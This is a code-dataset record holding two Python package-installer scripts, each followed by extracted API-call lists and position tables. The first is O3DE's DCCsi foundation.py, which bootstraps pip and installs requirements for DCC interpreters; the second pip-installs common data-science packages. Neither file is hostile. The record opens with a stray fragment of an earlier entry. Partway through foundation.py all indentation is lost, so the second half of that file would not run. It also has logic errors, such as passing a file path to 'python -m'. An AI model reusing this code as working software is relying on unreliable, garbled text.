'()\n', (5628, 5630), False, 'from e2e.bootstrap_resources import get_bootstrap_resources\n')] |
# coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi > / foundation.py
Running this module installs the DCCsi python requirements.txt for other python interpreters (like Maya)
It installs based on the python version into a location (such as):
<o3de>/Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/3rdParty/Python/Lib/3.x
This is to ensure that we are not modifying the users DCC tools install directly.
For this script to function on windows you may need Administrator privledges.
^ You only have to start with Admin rights if you are running foundation.py or otherwise updating packages
Open an admin elevated cmd prompt here:
C:\depot\o3de-dev\Gems\AtomLyIntegration\TechnicalArt\DccScriptingInterface
The following would execpt this script, the default behaviour is to check
the o3de python and install the requirements.txt for that python version,
>python.cmd foundation.py
To Do: document additional usage (how to install for Maya 2022 py3.7, etc.)
"""
# -------------------------------------------------------------------------
# standard imports
import subprocess
import sys
import os
import site
import timeit
import inspect
import traceback
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
#os.environ['PYTHONINSPECT'] = 'True'
# Capture module import start time for coarse timing diagnostics.
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'foundation'
_LOGGER = _logging.getLogger(_MODULENAME)
# NOTE(review): {_MODULENAME} is a set literal, so this logs
# "Initializing: {'foundation'}." -- probably intended plain _MODULENAME.
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Local access
_MODULE_PATH = Path(__file__) # this script
_PATH_DCCSIG = Path(_MODULE_PATH.parent) # dccsi
# Export the DCCsi root and put it on sys.path / cwd so sibling modules resolve.
os.environ['PATH_DCCSIG'] = _PATH_DCCSIG.as_posix()
site.addsitedir(_PATH_DCCSIG.as_posix()) # python path
os.chdir(_PATH_DCCSIG.as_posix())
# the path we want to install packages into
# Template: {0}=DCCsi root, {1}=python major, {2}=python minor.
STR_PATH_DCCSI_PYTHON_LIB = str('{0}\\3rdParty\\Python\\Lib\\{1}.x\\{1}.{2}.x\\site-packages')
# these are just defaults and are meant to be replaced by info for the target python.exe
_SYS_VER_MAJOR = sys.version_info.major
_SYS_VER_MINOR = sys.version_info.minor
# the default will be based on the python executable running this module
# this value should be replaced with the sys,version of the target python
# for example mayapy, or blenders python, etc.
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                       _SYS_VER_MAJOR,
                                                       _SYS_VER_MINOR))
# this is the shared default requirements.txt file to install for python 3.6.x+
_DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt')
# this will default to the python interpretter running this script (probably o3de)
# this should be relaced by the target interpretter python exe, like mayapy.exe
_PYTHON_EXE = Path(sys.executable)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def check_pip(python_exe=_PYTHON_EXE):
    """Check whether pip is available for the given interpreter.

    Runs `<python_exe> -m pip --version` and returns its return code
    (0 means pip is present). Returns 1 when the interpreter executable
    itself does not exist.
    """
    python_exe = Path(python_exe)
    # Guard clause: bail early when the target interpreter is missing.
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        return 1
    cmd = [python_exe.as_posix(), "-m", "pip", "--version"]
    result = subprocess.call(cmd)
    _LOGGER.info(f'foundation.check_pip(), result: {result}')
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def ensurepip(python_exe=_PYTHON_EXE, upgrade=False):
    """Bootstrap pip for the target interpreter via the stdlib `ensurepip` module.

    Note: ensurepip is known to fail on some python 3.7 builds with
    "ValueError: bad marshal data (unknown type code)"; in that case use
    foundation.install_pip() instead (o3de's bundled python already ships
    a working pip).

    :param python_exe: path to the target python executable.
    :param upgrade: pass --upgrade through to ensurepip.
    :return: subprocess return code (0 on success); 1 when python_exe is missing.
    """
    python_exe = Path(python_exe)
    if not python_exe.exists():
        _LOGGER.error(f'python_exe does not exist: {python_exe}')
        # Fixed: previously returned 0 (the success code) here, which was
        # inconsistent with check_pip() and misleading to callers.
        return 1
    if upgrade:
        result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip", "--upgrade"] )
        _LOGGER.info(f'foundation.ensurepip(python_exe, upgrade=True), result: {result}')
    else:
        result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip"] )
        _LOGGER.info(f'foundation.ensurepip(python_exe), result: {result}')
    return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_GET_PIP_PY37_URL = "https://bootstrap.pypa.io/get-pip.py"
_GET_PIP_PY27_URL = "https://bootstrap.pypa.io/pip/2.7/get-pip.py"
# version to download (DL): the current get-pip.py for py3.7+, the pinned
# legacy variant for py2.7.
# NOTE(review): python 3.0-3.6 leaves DL_URL undefined -- confirm those
# versions are out of scope for this tool.
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
    DL_URL = _GET_PIP_PY37_URL
elif sys.version_info.major < 3:
    DL_URL = _GET_PIP_PY27_URL
# temp dir to store in:
_PIP_DL_LOC = Path(_PATH_DCCSIG) / '__tmp__'
if not _PIP_DL_LOC.exists():
    try:
        _PIP_DL_LOC.mkdir(parents=True)
    except Exception as e:
        # Fixed: the message previously referenced undefined name
        # PIP_DL_LOC, raising NameError inside the handler.
        _LOGGER.error(f'error: {e}, could not .mkdir(): {_PIP_DL_LOC.as_posix()}')
# default file location to store it:
_PIP_DL_LOC = _PIP_DL_LOC / 'get-pip.py'
try:
    _PIP_DL_LOC.touch(mode=0o666, exist_ok=True)
except Exception as e:
    # Fixed: same undefined PIP_DL_LOC reference as above.
    _LOGGER.error(f'error: {e}, could not .touch(): {_PIP_DL_LOC.as_posix()}')
def download_getpip(url=DL_URL, file_store=_PIP_DL_LOC):
"""Attempts to download the get-pip.py script"""
import requests
# ensure what is passed in is a Path object
file_store = Path(file_store)
file_store = Path.joinpath(file_store)
try:
file_store.exists()
except FileExistsError as e:
try:
file_store.touch()
except FileExistsError as e:
_LOGGER.error(f'Could not make file: {file_store}')
try:
_get_pip = requests.get(url)
except Exception as e:
_LOGGER.error(f'could not request: {url}')
try:
file = open(file_store.as_posix(), 'wb').write(_get_pip.content)
return file
except IOError as e:
_LOGGER.error(f'could not write: {file_store.as_posix()}')
return None
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pip(python_exe=_PYTHON_EXE, download=True, upgrade=True, getpip=_PIP_DL_LOC):
"""Installs pip via get-pip.py"""
result = 0
if download:
getpip = download_getpip()
if not getpip:
return result
python_exe = Path(python_exe)
if python_exe.exists():
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", getpip] )
_LOGGER.info(f'result: {result}')
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
if upgrade:
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", "pip", "install", "--upgrade", "pip"] )
_LOGGER.info(f'result: {result}')
return result
return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# version of requirements.txt to installa
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
_REQUIREMENTS = _DCCSI_PYTHON_REQUIREMENTS
elif sys.version_info.major == 2 and sys.version_info.minor >= 7:
_LOGGER.warning('Python 2.7 is end of life, we recommend using tools that operate py3.7 or higher')
_REQUIREMENTS = Path(_PATH_DCCSIG,
'Tools',
'Resources',
'py27',
'requirements.txt').as_posix()
else:
_REQUIREMENTS = None
_LOGGER.error(f'Unsupported version: {sys.version_info}')
def install_requirements(python_exe=_PYTHON_EXE,
requirements=_REQUIREMENTS,
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs the DCCsi requirments.txt"""
python_exe = Path(python_exe)
requirements = Path(requirements)
target_loc = Path(target_loc)
if python_exe.exists():
## install required packages
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install",
"-r", requirements.as_posix(), "-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pkg(python_exe=_PYTHON_EXE,
pkg_name='pathlib',
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs a pkg for DCCsi"""
python_exe = Path(python_exe)
pkg_name = Path(pkg_name)
target_loc = Path(target_loc)
if python_exe.exists():
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install", pkg_name.as_posix(),
"-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def run_command() -> 'subprocess.CompletedProcess[str]':
"""Run some subprocess that captures output as ``str``"""
return subprocess.CompletedProcess(args=[], returncode=0, stdout='')
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def arg_bool(bool_arg, desc='arg desc not set'):
"""cast a arg bool to a python bool"""
_LOGGER.info(f"Checking '{desc}': {bool_arg}")
if bool_arg in ('True', 'true', '1'):
return True
elif bool_arg in ('False', 'false', '0'):
return False
else:
return bool_arg
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def set_version(ver_major=sys.version_info.major, ver_minor=sys.version_info.minor):
global _SYS_VER_MAJOR
global _SYS_VER_MINOR
global _PATH_DCCSI_PYTHON_LIB
_SYS_VER_MAJOR = ver_major
_SYS_VER_MINOR = ver_minor
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
_SYS_VER_MAJOR,
_SYS_VER_MINOR))
return _PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def get_version(_PYTHON_EXE):
_PYTHON_EXE = Path(_PYTHON_EXE)
if _PYTHON_EXE.exists():
# this will switch to run the specified dcc tools python exe and determine version
_COMMAND = [_PYTHON_EXE.as_posix(), "--version"]
_process = subprocess.Popen(_COMMAND, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_out, _err = _process.communicate()
_out = _out.decode("utf-8") # decodes byte string to string
_out = _out.replace("\r\n", "") # clean
_LOGGER.info(f'Python Version is: {_out}')
_ver = _out.split(" ")[-1] # split by space, take version
_ver = _ver.split('.') # splity by . to list
return _ver
else:
_LOGGER.error(f'Python exe does not exist: {_PYTHON_EXE.as_posix()}')
return None
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as main (external commandline)"""
#os.environ['PYTHONINSPECT'] = 'True'
STR_CROSSBAR = f"{'-' * 74}"
_DCCSI_GDEBUG = False
_DCCSI_DEV_MODE = False
# default loglevel to info unless set
_DCCSI_LOGLEVEL = _logging.INFO
if _DCCSI_GDEBUG:
# override loglevel if runnign debug
_DCCSI_LOGLEVEL = _logging.DEBUG
FRMT_LOG_LONG = "[%(name)s][%(levelname)s] >> %(message)s (%(asctime)s; %(filename)s:%(lineno)d)"
# configure basic logger
# note: not using a common logger to reduce cyclical imports
_logging.basicConfig(level=_DCCSI_LOGLEVEL,
format=FRMT_LOG_LONG,
datefmt='%m-%d %H:%M')
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.info(STR_CROSSBAR)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
_LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG))
_LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE))
_LOGGER.debug('_DCCSI_LOGLEVEL: {}'.format(_DCCSI_LOGLEVEL))
import argparse
parser = argparse.ArgumentParser(
description='O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools.',
epilog="It is suggested to use '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
parser.add_argument('-gd', '--global-debug',
type=bool,
required=False,
help='Enables global debug flag.')
parser.add_argument('-dm', '--developer-mode',
type=bool,
required=False,
default=False,
help='(NOT IMPLEMENTED) Enables dev mode for early auto attaching debugger.')
parser.add_argument('-sd', '--set-debugger',
type=str,
required=False,
default='WING',
help='(NOT IMPLEMENTED) Default debugger: WING, others: PYCHARM and VSCODE.')
parser.add_argument('-py', '--python_exe',
type=str,
required=False,
help='The python interpretter you want to run in the subprocess')
parser.add_argument('-cp', '--check_pip',
required=False,
default=True,
help='Checks for pip')
parser.add_argument('-ep', '--ensurepip',
required=False,
default=False,
help='Uses ensurepip, to make sure pip is installed')
parser.add_argument('-ip', '--install_pip',
required=False,
default=False,
help='Attempts install pip via download of get-pip.py')
parser.add_argument('-ir', '--install_requirements',
required=False,
default=True,
help='Exits python')
parser.add_argument('-ex', '--exit',
type=bool,
required=False,
default=False,
help='Exits python. Do not exit if you want to be in interactive interpretter after config')
args = parser.parse_args()
# easy overrides
if args.global_debug:
_DCCSI_GDEBUG = True
os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG)
if not args.python_exe:
_LOGGER.warning("It is suggested to use arg '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
if args.python_exe:
_PYTHON_EXE = Path(args.python_exe)
_LOGGER.info(f'Target py exe is: {_PYTHON_EXE}')
if _PYTHON_EXE.exists():
_py_version = get_version(_PYTHON_EXE)
# then we can change the version dependant target folder for pkg install
_PATH_DCCSI_PYTHON_LIB = set_version(_py_version[0], _py_version[1])
if _PATH_DCCSI_PYTHON_LIB.exists():
_LOGGER.info(f'Requirements, install target: {_PATH_DCCSI_PYTHON_LIB}')
else:
_PATH_DCCSI_PYTHON_LIB.touch()
_LOGGER.info(f'.touch(): {_PATH_DCCSI_PYTHON_LIB}')
else:
_LOGGER.error(f'This py exe does not exist:{_PYTHON_EXE}')
sys.exit()
# this will verify pip is installed for the target python interpretter/env
if arg_bool(args.check_pip, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.check_pip()')
result = check_pip(_PYTHON_EXE)
if result != 0:
_LOGGER.warning( f'check_pip(), Invalid result: { result }' )
if arg_bool(args.ensurepip, desc='args.ensurepip'):
_LOGGER.info(f'calling foundation.ensurepip()')
ensurepip(_PYTHON_EXE)
if arg_bool(args.install_pip, desc='args.install_pip'):
_LOGGER.info(f'calling foundation.install_pip()')
install_pip(_PYTHON_EXE)
# installing the requirments.txt is enabled by default
if arg_bool(args.install_requirements, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.install_requirements( {_PYTHON_EXE}, target_loc = {_PATH_DCCSI_PYTHON_LIB.as_posix()} )')
install_requirements(_PYTHON_EXE, target_loc = _PATH_DCCSI_PYTHON_LIB.as_posix())
# -- DONE ----
_LOGGER.info(STR_CROSSBAR)
_LOGGER.info('O3DE DCCsi {0}.py took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
if args.exit:
import sys
# return
sys.exit()
else:
# custom prompt
sys.ps1 = "[{}]>>".format(_MODULENAME)
# --- END -----------------------------------------------------------------
| [
"logging.getLogger",
"logging.basicConfig",
"pathlib.Path.joinpath",
"pathlib.Path",
"argparse.ArgumentParser",
"timeit.default_timer",
"subprocess.CompletedProcess",
"subprocess.Popen",
"requests.get",
"subprocess.call",
"sys.exit"
] | [((1740, 1762), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1760, 1762), False, 'import timeit\n'), ((1833, 1864), 'logging.getLogger', '_logging.getLogger', (['_MODULENAME'], {}), '(_MODULENAME)\n', (1851, 1864), True, 'import logging as _logging\n'), ((2106, 2120), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (2110, 2120), False, 'from pathlib import Path\n'), ((2161, 2186), 'pathlib.Path', 'Path', (['_MODULE_PATH.parent'], {}), '(_MODULE_PATH.parent)\n', (2165, 2186), False, 'from pathlib import Path\n'), ((3186, 3224), 'pathlib.Path', 'Path', (['_PATH_DCCSIG', '"""requirements.txt"""'], {}), "(_PATH_DCCSIG, 'requirements.txt')\n", (3190, 3224), False, 'from pathlib import Path\n'), ((3403, 3423), 'pathlib.Path', 'Path', (['sys.executable'], {}), '(sys.executable)\n', (3407, 3423), False, 'from pathlib import Path\n'), ((3692, 3708), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (3696, 3708), False, 'from pathlib import Path\n'), ((4600, 4616), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (4604, 4616), False, 'from pathlib import Path\n'), ((5652, 5670), 'pathlib.Path', 'Path', (['_PATH_DCCSIG'], {}), '(_PATH_DCCSIG)\n', (5656, 5670), False, 'from pathlib import Path\n'), ((6301, 6317), 'pathlib.Path', 'Path', (['file_store'], {}), '(file_store)\n', (6305, 6317), False, 'from pathlib import Path\n'), ((6335, 6360), 'pathlib.Path.joinpath', 'Path.joinpath', (['file_store'], {}), '(file_store)\n', (6348, 6360), False, 'from pathlib import Path\n'), ((7334, 7350), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (7338, 7350), False, 'from pathlib import Path\n'), ((8865, 8881), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (8869, 8881), False, 'from pathlib import Path\n'), ((8901, 8919), 'pathlib.Path', 'Path', (['requirements'], {}), '(requirements)\n', (8905, 8919), False, 'from pathlib import Path\n'), ((8937, 8953), 'pathlib.Path', 'Path', 
(['target_loc'], {}), '(target_loc)\n', (8941, 8953), False, 'from pathlib import Path\n'), ((9673, 9689), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (9677, 9689), False, 'from pathlib import Path\n'), ((9705, 9719), 'pathlib.Path', 'Path', (['pkg_name'], {}), '(pkg_name)\n', (9709, 9719), False, 'from pathlib import Path\n'), ((9737, 9753), 'pathlib.Path', 'Path', (['target_loc'], {}), '(target_loc)\n', (9741, 9753), False, 'from pathlib import Path\n'), ((10364, 10425), 'subprocess.CompletedProcess', 'subprocess.CompletedProcess', ([], {'args': '[]', 'returncode': '(0)', 'stdout': '""""""'}), "(args=[], returncode=0, stdout='')\n", (10391, 10425), False, 'import subprocess\n'), ((11760, 11777), 'pathlib.Path', 'Path', (['_PYTHON_EXE'], {}), '(_PYTHON_EXE)\n', (11764, 11777), False, 'from pathlib import Path\n'), ((13399, 13492), 'logging.basicConfig', '_logging.basicConfig', ([], {'level': '_DCCSI_LOGLEVEL', 'format': 'FRMT_LOG_LONG', 'datefmt': '"""%m-%d %H:%M"""'}), "(level=_DCCSI_LOGLEVEL, format=FRMT_LOG_LONG, datefmt=\n '%m-%d %H:%M')\n", (13419, 13492), True, 'import logging as _logging\n'), ((13552, 13583), 'logging.getLogger', '_logging.getLogger', (['_MODULENAME'], {}), '(_MODULENAME)\n', (13570, 13583), True, 'import logging as _logging\n'), ((13903, 14175), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools."""', 'epilog': '"""It is suggested to use \'-py\' or \'--python_exe\' to pass in the python exe for the target dcc tool."""'}), '(description=\n \'O3DE DCCsi Setup (aka Foundation). 
Will install DCCsi python package dependancies, for various DCC tools.\'\n , epilog=\n "It is suggested to use \'-py\' or \'--python_exe\' to pass in the python exe for the target dcc tool."\n )\n', (13926, 14175), False, 'import argparse\n'), ((6606, 6623), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (6618, 6623), False, 'import requests\n'), ((7440, 7483), 'subprocess.call', 'subprocess.call', (["[python_exe, '-m', getpip]"], {}), "([python_exe, '-m', getpip])\n", (7455, 7483), False, 'import subprocess\n'), ((7698, 7771), 'subprocess.call', 'subprocess.call', (["[python_exe, '-m', 'pip', 'install', '--upgrade', 'pip']"], {}), "([python_exe, '-m', 'pip', 'install', '--upgrade', 'pip'])\n", (7713, 7771), False, 'import subprocess\n'), ((9184, 9209), 'subprocess.call', 'subprocess.call', (['inst_cmd'], {}), '(inst_cmd)\n', (9199, 9209), False, 'import subprocess\n'), ((9937, 9962), 'subprocess.call', 'subprocess.call', (['inst_cmd'], {}), '(inst_cmd)\n', (9952, 9962), False, 'import subprocess\n'), ((11974, 12048), 'subprocess.Popen', 'subprocess.Popen', (['_COMMAND'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '(_COMMAND, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (11990, 12048), False, 'import subprocess\n'), ((16524, 16545), 'pathlib.Path', 'Path', (['args.python_exe'], {}), '(args.python_exe)\n', (16528, 16545), False, 'from pathlib import Path\n'), ((18429, 18439), 'sys.exit', 'sys.exit', ([], {}), '()\n', (18437, 18439), False, 'import sys\n'), ((17222, 17232), 'sys.exit', 'sys.exit', ([], {}), '()\n', (17230, 17232), False, 'import sys\n'), ((8354, 8422), 'pathlib.Path', 'Path', (['_PATH_DCCSIG', '"""Tools"""', '"""Resources"""', '"""py27"""', '"""requirements.txt"""'], {}), "(_PATH_DCCSIG, 'Tools', 'Resources', 'py27', 'requirements.txt')\n", (8358, 8422), False, 'from pathlib import Path\n'), ((18332, 18354), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (18352, 18354), False, 'import timeit\n')] 
|
import importlib
import platform
import site
import subprocess
import sys
import traceback
class InstallerClass:
sci_win = ['python', '-m', 'pip', 'install', 'scikit-learn']
nump_win = ['python', '-m', 'pip', 'install', 'numpy']
pan_win = ['python', '-m', 'pip', 'install', 'pandas']
req_win = ['python', '-m', 'pip', 'install', 'requests-html']
bs4_win = ['python', '-m', 'pip', 'install', 'beautifulsoup4']
mat_win = ['python', '-m', 'pip', 'install', 'matplotlib']
sci = ['python3', '-m', 'pip', 'install', 'scikit-learn']
nump = ['python3', '-m', 'pip', 'install', 'numpy']
pan = ['python3', '-m', 'pip', 'install', 'pandas']
req = ['python3', '-m', 'pip', 'install', 'requests-html']
bs4 = ['python3', '-m', 'pip', 'install', 'beautifulsoup4']
mat = ['python3', '-m', 'pip', 'install', 'matplotlib']
def sci_win_method(self):
try:
ret_sci_win = subprocess.run(self.sci_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci_win)
except Exception:
traceback.print_exc()
def nump_win_method(self):
try:
ret_nump_win = subprocess.run(self.nump_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump_win)
except Exception:
traceback.print_exc()
def pan_win_method(self):
try:
ret_pan_win = subprocess.run(self.pan_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan_win)
except Exception:
traceback.print_exc()
def req_win_method(self):
try:
ret_req_win = subprocess.run(self.req_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req_win)
except Exception:
traceback.print_exc()
def bs4_win_method(self):
try:
ret_bs4_win = subprocess.run(self.bs4_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4_win)
except Exception:
traceback.print_exc()
def mat_win_method(self):
try:
ret_mat_win = subprocess.run(self.mat_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat_win)
except Exception:
traceback.print_exc()
def sci_method(self):
try:
ret_sci = subprocess.run(self.sci, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci)
except Exception:
traceback.print_exc()
def nump_method(self):
try:
ret_nump = subprocess.run(self.nump, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump)
except Exception:
traceback.print_exc()
def pan_method(self):
try:
ret_pan = subprocess.run(self.pan, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan)
except Exception:
traceback.print_exc()
def req_method(self):
try:
ret_req = subprocess.run(self.req, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req)
except Exception:
traceback.print_exc()
def bs4_method(self):
try:
ret_bs4 = subprocess.run(self.bs4, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4)
except Exception:
traceback.print_exc()
def mat_method(self):
try:
ret_mat = subprocess.run(self.mat, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat)
except Exception:
traceback.print_exc()
if sys.version_info[0] == 2:
print("This installer is Python2 not supported.")
elif sys.version_info[0] == 3:
pf = platform.system()
if pf == 'Windows':
InstClass = InstallerClass()
InstClass.sci_win_method()
InstClass.nump_win_method()
InstClass.pan_win_method()
InstClass.req_win_method()
InstClass.bs4_win_method()
InstClass.mat_win_method()
elif pf == 'Darwin':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
elif pf == 'Linux':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
else:
print("Installer does not support OS other than Windows, MacOS and Linux kernel.")
else:
print("A version other than Python2 and Python3. Does not match.")
importlib.reload(site)
| [
"traceback.print_exc",
"platform.system",
"subprocess.run",
"importlib.reload"
] | [((4649, 4671), 'importlib.reload', 'importlib.reload', (['site'], {}), '(site)\n', (4665, 4671), False, 'import importlib\n'), ((3678, 3695), 'platform.system', 'platform.system', ([], {}), '()\n', (3693, 3695), False, 'import platform\n'), ((926, 996), 'subprocess.run', 'subprocess.run', (['self.sci_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.sci_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (940, 996), False, 'import subprocess\n'), ((1160, 1231), 'subprocess.run', 'subprocess.run', (['self.nump_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.nump_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1174, 1231), False, 'import subprocess\n'), ((1394, 1464), 'subprocess.run', 'subprocess.run', (['self.pan_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.pan_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1408, 1464), False, 'import subprocess\n'), ((1626, 1696), 'subprocess.run', 'subprocess.run', (['self.req_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.req_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1640, 1696), False, 'import subprocess\n'), ((1858, 1928), 'subprocess.run', 'subprocess.run', (['self.bs4_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.bs4_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1872, 1928), False, 'import subprocess\n'), ((2090, 2160), 'subprocess.run', 'subprocess.run', (['self.mat_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.mat_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (2104, 2160), False, 'import subprocess\n'), ((2314, 2380), 'subprocess.run', 'subprocess.run', (['self.sci'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.sci, encoding='utf-8', stderr=subprocess.PIPE)\n", (2328, 2380), False, 'import subprocess\n'), ((2532, 2599), 'subprocess.run', 'subprocess.run', (['self.nump'], {'encoding': '"""utf-8"""', 'stderr': 
'subprocess.PIPE'}), "(self.nump, encoding='utf-8', stderr=subprocess.PIPE)\n", (2546, 2599), False, 'import subprocess\n'), ((2750, 2816), 'subprocess.run', 'subprocess.run', (['self.pan'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.pan, encoding='utf-8', stderr=subprocess.PIPE)\n", (2764, 2816), False, 'import subprocess\n'), ((2966, 3032), 'subprocess.run', 'subprocess.run', (['self.req'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.req, encoding='utf-8', stderr=subprocess.PIPE)\n", (2980, 3032), False, 'import subprocess\n'), ((3182, 3248), 'subprocess.run', 'subprocess.run', (['self.bs4'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.bs4, encoding='utf-8', stderr=subprocess.PIPE)\n", (3196, 3248), False, 'import subprocess\n'), ((3398, 3464), 'subprocess.run', 'subprocess.run', (['self.mat'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.mat, encoding='utf-8', stderr=subprocess.PIPE)\n", (3412, 3464), False, 'import subprocess\n'), ((1066, 1087), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1085, 1087), False, 'import traceback\n'), ((1302, 1323), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1321, 1323), False, 'import traceback\n'), ((1534, 1555), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1553, 1555), False, 'import traceback\n'), ((1766, 1787), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1785, 1787), False, 'import traceback\n'), ((1998, 2019), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2017, 2019), False, 'import traceback\n'), ((2230, 2251), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2249, 2251), False, 'import traceback\n'), ((2446, 2467), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2465, 2467), False, 'import traceback\n'), ((2666, 2687), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2685, 2687), False, 
'import traceback\n'), ((2882, 2903), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2901, 2903), False, 'import traceback\n'), ((3098, 3119), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3117, 3119), False, 'import traceback\n'), ((3314, 3335), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3333, 3335), False, 'import traceback\n'), ((3530, 3551), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3549, 3551), False, 'import traceback\n')] |
